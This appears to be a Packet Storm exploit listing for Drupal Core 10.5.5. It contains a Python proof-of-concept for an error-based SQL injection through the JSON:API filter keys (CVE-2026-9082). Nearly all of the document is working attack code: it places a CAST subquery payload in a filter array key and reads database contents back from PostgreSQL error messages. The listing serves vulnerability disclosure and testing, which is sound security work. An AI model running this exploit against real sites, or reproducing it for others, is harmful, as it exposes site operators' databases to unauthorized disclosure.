Share
## https://sploitus.com/exploit?id=PACKETSTORM:222450
# Exploit Title: Drupal Core 10.5.5 - Error-Based SQL Injection 
    # Google Dork: N/A
    # Date: 2026-05-31
    # Exploit Author: cardosource
    # Vendor Homepage: https://www.drupal.org
    # Software Link: https://www.drupal.org/project/drupal
    # Version: Drupal Core 10.5.5
    # Tested on: Debian Linux (Docker), PHP 8.2, Apache, PostgreSQL 17
    # CVE: CVE-2026-9082
    #
    # Description:
    # This proof-of-concept demonstrates an Error-Based SQL Injection in
    # Drupal Core 10.5.5 (PostgreSQL). User-controlled JSON:API filter
    # array keys influence SQL query construction, allowing database
    # information disclosure through SQL error messages.
    
    
    
    import requests
    import json
    from urllib.parse import urlencode
    
    TARGET_URL = "http://localhost:8080/jsonapi/node/article"
    
    BANNER = """
    [+] Drupal Core 10.5.5 - Error-Based SQL Injection
    [+] CVE-2026-9082
    [+] Target: JSON:API (PostgreSQL)
    """
    
    
    def extract_data(subquery):
        headers = {
            "Accept": "application/vnd.api+json",
            "Content-Type": "application/vnd.api+json"
        }
        
        payload = f"0||CAST(({subquery}) AS INTEGER)"
       
        params = {
            "filter[my_filter][condition][path]": "title",
            "filter[my_filter][condition][operator]": "IN",
            "filter[my_filter][condition][value][0]": "Example",
            f"filter[my_filter][condition][value][{payload}]": "Injection"
        }
        
        try:
            response = requests.get(TARGET_URL, headers=headers, params=params, timeout=10)
           
            if response.status_code == 500:
                try:
                    error = response.json().get("errors", [{}])[0].get("detail", "")
                    if "invalid input syntax" in error:
                        data = error.split('"')[1] if '"' in error else error
                        print(f"\033[92m[SUCCESS]\033[0m {data}")
                except json.JSONDecodeError:
                    pass
        except requests.exceptions.RequestException:
            pass
    
    
    if __name__ == "__main__":
        print(BANNER) 
        extract_data("SELECT version()")